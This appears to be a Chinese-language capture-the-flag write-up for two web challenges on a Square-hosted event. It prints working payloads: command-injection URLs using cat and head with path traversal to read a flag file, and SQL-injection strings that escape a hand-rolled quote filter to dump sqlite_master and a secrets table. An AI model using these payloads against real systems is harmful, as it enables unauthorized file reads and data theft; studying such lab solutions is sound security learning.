菜鸡菜鸡菜

Password checker

F12一下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

function validate(objForm) {
  let toBeCheckedValue = objForm.elements['password'].value;

  let xmlHttp = new XMLHttpRequest();
  xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false);
  xmlHttp.send(null);
  let actualValue = xmlHttp.responseText;

  if (toBeCheckedValue != actualValue) {
    alert('Passwords don\'t match!');
  } else {
    alert('Password validated!');
  }
}

然后列目录后cat flag文件 https://gycyk-zynog-bacem-ginic-mygor.capturethesquare.com/run.php?cmd=cat%20../../../../../var/www/flag.txt

line 2: flap-31aac7e26de449ee 得到上面面的东西,但是是错的。发现前面带了个line 2,可能是cat只读取了文件的最后一行,于是就用了head,姿势+1 https://gycyk-zynog-bacem-ginic-mygor.capturethesquare.com/run.php?cmd=head -n 1 ../../../../../var/www/flag.txt

Little Doggy Tables

下载源文件,是个ruby站,硬着头皮看吧

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

#!/usr/bin/env ruby

# author: Will McChesney <wmcc@squareup.com>

require "sqlite3"
require "webrick"

PORT = ARGV[0]

class SecureDatastore
  include Singleton

  def initialize
    @db = SQLite3::Database.new("secure.db")
  end

  def secure_species_lookup(insecure_codename)
    # roll our own escaping to prevent SQL injection attacks
    secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
    query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"

    puts query
    results = @db.execute(query)

    return if results.length == 0
    results[0][0]
  end
end

server = WEBrick::HTTPServer.new(Port: PORT)

trap("INT") { server.shutdown }

class AgentLookupServlet < WEBrick::HTTPServlet::AbstractServlet
  def do_GET(request, response)
    response.status = 200
    response["Content-Type"] = "text/plain"

    response.body = SecureDatastore.instance.secure_species_lookup(request.query["codename"]) + "\n"
  end
end

server.mount "/agent_lookup", AgentLookupServlet

server.start

看了个大概,应该是个注入,数据库用的是sqlite3,并且把单引号转义了,问题不大,在单引号前加个\,单引号就逃逸了 用不了database(),还有sqlite的系统表sqlite_master 于是 https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union SELECT sql from sqlite_master-- a

1
2
3
4
5

CREATE TABLE operatives (
        codename TEXT,
        species TEXT,
        secret TEXT
      )

然后菜鸡我就一行一行寻找… https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union SELECT secret from operatives limit 9,1 -- a